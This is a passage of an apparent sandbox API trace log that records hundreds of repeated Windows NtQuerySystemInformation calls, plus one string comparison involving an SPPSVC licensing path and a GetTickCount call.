NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.356] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe0f0, Length=0x58, ResultLength=0x0) [0264.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe060, Length=0x28, ResultLength=0x0) [0264.357] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0264.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe0f0, Length=0x58, ResultLength=0x0) [0264.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe0f0, Length=0x58, ResultLength=0x0) [0264.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe0f0, Length=0x58, ResultLength=0x0) [0264.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdfd0, Length=0x38, ResultLength=0x0) [0264.361] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.361] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.362] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfde10, Length=0x28, ResultLength=0x0) [0264.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfde10, Length=0x28, ResultLength=0x0) [0264.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfde10, Length=0x28, ResultLength=0x0) [0264.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfde80, Length=0x28, ResultLength=0x0) [0264.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdfd0, Length=0x38, ResultLength=0x0) [0264.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdfd0, Length=0x38, ResultLength=0x0) [0264.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdf00, Length=0x28, ResultLength=0x0) [0264.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.366] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdf00, Length=0x28, ResultLength=0x0) [0264.366] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.366] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.366] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdfd0, Length=0x38, ResultLength=0x0) [0264.366] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.366] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdfd0, Length=0x38, ResultLength=0x0) [0264.366] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.366] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.366] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.366] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.366] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.366] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.366] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdd70, Length=0x20, ResultLength=0x0) [0264.367] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdcf0, Length=0x20, ResultLength=0x0) [0264.367] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.367] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdcf0, Length=0x20, ResultLength=0x0) [0264.367] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.367] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdcf0, Length=0x20, ResultLength=0x0) [0264.367] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.367] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.367] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.367] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdf40, Length=0x20, ResultLength=0x0) [0264.367] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.367] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.367] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdfd0, Length=0x38, ResultLength=0x0) [0264.367] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfde60, Length=0x20, ResultLength=0x0) [0264.367] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdde0, Length=0x20, ResultLength=0x0) [0264.367] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.367] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdde0, Length=0x20, ResultLength=0x0) [0264.367] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.367] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdde0, Length=0x20, ResultLength=0x0) [0264.367] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.367] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdfd0, Length=0x38, ResultLength=0x0) [0264.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfde60, Length=0x20, ResultLength=0x0) [0264.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdde0, Length=0x20, ResultLength=0x0) [0264.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdde0, Length=0x20, ResultLength=0x0) [0264.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdde0, Length=0x20, ResultLength=0x0) [0264.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdfd0, Length=0x38, ResultLength=0x0) [0264.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfde60, Length=0x20, ResultLength=0x0) [0264.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfddf0, Length=0x20, ResultLength=0x0) [0264.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfddf0, Length=0x20, ResultLength=0x0) [0264.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe0f0, Length=0x58, ResultLength=0x0) [0264.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe030, Length=0x20, ResultLength=0x0) [0264.369] GetTickCount () returned 0x118271d [0264.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdee8, Length=0x58, ResultLength=0x0) [0264.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfde00, Length=0x38, ResultLength=0x0) [0264.371] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.371] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc30, Length=0x28, ResultLength=0x0) [0264.371] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.371] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.371] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc30, Length=0x28, ResultLength=0x0) [0264.371] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.371] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.371] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc30, Length=0x28, ResultLength=0x0) [0264.371] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.371] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.371] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc30, Length=0x28, ResultLength=0x0) [0264.371] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.371] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdca0, Length=0x28, ResultLength=0x0) [0264.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfde00, Length=0x38, ResultLength=0x0) [0264.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdd20, Length=0x28, ResultLength=0x0) [0264.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdd20, Length=0x28, ResultLength=0x0) [0264.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfde00, Length=0x38, ResultLength=0x0) [0264.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc80, Length=0x20, ResultLength=0x0) [0264.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc00, Length=0x20, ResultLength=0x0) [0264.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc00, Length=0x20, ResultLength=0x0) [0264.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc00, Length=0x20, ResultLength=0x0) [0264.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfde00, Length=0x38, ResultLength=0x0) [0264.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc80, Length=0x20, ResultLength=0x0) [0264.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc10, Length=0x20, ResultLength=0x0) [0264.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc10, Length=0x20, ResultLength=0x0) [0264.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdee8, Length=0x58, ResultLength=0x0) [0264.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfddc0, Length=0x38, ResultLength=0x0) [0264.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.382] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.382] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.382] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc00, Length=0x28, ResultLength=0x0) [0264.382] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.382] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.382] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc00, Length=0x28, ResultLength=0x0) [0264.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc00, Length=0x28, ResultLength=0x0) [0264.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc00, Length=0x28, ResultLength=0x0) [0264.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc70, Length=0x28, ResultLength=0x0) [0264.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfddc0, Length=0x38, ResultLength=0x0) [0264.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfddc0, Length=0x38, ResultLength=0x0) [0264.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdcf0, Length=0x28, ResultLength=0x0) [0264.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdcf0, Length=0x28, ResultLength=0x0) [0264.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfddc0, Length=0x38, ResultLength=0x0) [0264.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfddc0, Length=0x38, ResultLength=0x0) [0264.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb60, Length=0x20, ResultLength=0x0) [0264.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdae0, Length=0x20, ResultLength=0x0) [0264.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdae0, Length=0x20, ResultLength=0x0) [0264.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdae0, Length=0x20, ResultLength=0x0) [0264.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdd30, Length=0x20, ResultLength=0x0) [0264.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfddc0, Length=0x38, ResultLength=0x0) [0264.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc50, Length=0x20, ResultLength=0x0) [0264.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdbd0, Length=0x20, ResultLength=0x0) [0264.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdbd0, Length=0x20, ResultLength=0x0) [0264.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdbd0, Length=0x20, ResultLength=0x0) [0264.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfddc0, Length=0x38, ResultLength=0x0) [0264.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc50, Length=0x20, ResultLength=0x0) [0264.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdbd0, Length=0x20, ResultLength=0x0) [0264.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdbd0, Length=0x20, ResultLength=0x0) [0264.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdbd0, Length=0x20, ResultLength=0x0) [0264.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfddc0, Length=0x38, ResultLength=0x0) [0264.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc50, Length=0x20, ResultLength=0x0) [0264.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdbe0, Length=0x20, ResultLength=0x0) [0264.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, 